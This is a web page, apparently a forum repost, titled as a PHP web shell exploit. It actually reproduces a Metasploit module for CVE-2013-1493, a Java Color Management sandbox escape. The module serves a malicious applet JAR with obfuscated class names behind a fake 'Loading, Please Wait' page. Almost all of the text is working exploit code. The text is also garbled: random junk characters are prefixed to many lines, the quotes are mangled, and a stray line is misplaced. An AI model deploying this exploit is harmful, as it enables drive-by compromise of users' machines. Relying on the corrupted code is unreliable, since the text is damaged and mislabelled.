STUNSHELL PHP Web Shell远程执行代码

admin

##
  ~! l2 n& g" ?; N  ~5 @
& A2 D5 H9 B) M* x# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
1 `  W6 H4 Q# I" Z# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
5 n/ S$ ~+ U) }; ]; e% Yrequire ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
4 O) R$ V  X( c5 U! |8 ainclude Msf::Exploit::Remote::HttpServer::HTML
; @; e, X+ ~0 w+ Minclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
% u+ a0 j, Z0 a, Lautopwn_info({ :javascript => false })
2 u" L8 q* d1 e- Fdef initialize( info = {} )
( J. [$ @& d% _/ S  qsuper( update_info( info,
6 c0 G6 d7 P' j# ?3 P( w$ W‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
% |, r, ~" M% i5 R5 V' Q# narbitrary Java code outside of the sandbox as exploited in the wild in February
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
& J4 c  I8 h7 q7 M2 |/ a0 S+ cand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
8 a% |$ J3 l: I9 ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
* x  z4 o+ b5 ?% M9 s& N7 T: E},
‘License’ => MSF_LICENSE,
/ ?6 k( w; r: z: y‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
3 j" @, r  m# }- @/ ^'juan vazquez' # Metasploit module (just ported the published exploit)
],
6 t% n. N5 G/ t& Z/ G. X2 j‘References’ =>
[
[ 'CVE', '2013-1493' ],
1 u4 Y$ b5 d  a! E2 o[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
& q  W( G1 ~# t4 f1 U[ 'URL', 'http://pastie.org/pastes/6581034' ]
/ U/ `- b7 l, p/ o],
" ~5 h1 l8 c' s' p7 u9 C! K, ~! W‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
[ 'Generic (Java Payload)',
{
: {! S  o0 D; w- F'Platform' => 'java',
; n) M6 d# }# ^. a5 H'Arch' => ARCH_JAVA
! o0 Y6 G8 Z9 B* @& g( ~8 ~8 N}
+ ?3 {3 c5 i% h% T* }* W5 H],
[ 'Windows x86 (Native Payload)',
{
3 |4 \% }4 I6 T# Y, R& r'Platform' => 'win',
'Arch' => ARCH_X86
# B9 r+ {, X5 X5 e, o8 ^7 H}
]
],
8 W; X% e: |& E‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
: |) c" C5 `* D* p0 bdef setup
3 z3 X. I3 F, r1 }$ o, Hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
3 m0 a3 E' w9 B4 o# F: y' o6 ?/ p7 r@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
* E* y3 t2 b7 y: p# N@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 K/ C+ z& F1 P+ Dpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, c# Q' }8 c) Z  G@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
& A" y3 i2 T; M6 s: g( ]7 hsuper
end
* e' u' r( t; ^/ _+ y1 ]def on_request_uri(cli, request)
/ n) o4 y* R) }# U* [! Gprint_status(“handling request for #{request.uri}”)
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
8 H# U5 U; C) v: X% fjar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
+ Y$ p+ |5 [6 yjar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
4 V1 m6 O5 u. ^- f  {. Kmetasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
0 M- h! d) H! a8 ientry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
: a6 }( M* t6 f, K0 {1 nsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
# N1 o. {: r" S; V# Z& Nsend_not_found(cli)
return
end
8 V( S7 h2 i2 c; C" |' Csend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
end
end
0 V' B2 v* G  s  K8 Q9 {, `! Tdef generate_html
4 i; A: I3 ]& F4 \html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
1 A9 Z- ]+ m  \# T" G3 e4 Dhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
. q& m, F7 _6 W8 C! Ereturn html
( h3 s+ j8 y0 \5 G) _2 i9 `4 kend
end
3 M& p6 ~7 g, r7 O: U7 X. O$ [end
1 d  p) U# C* e. x3 m5 l) J$ m. {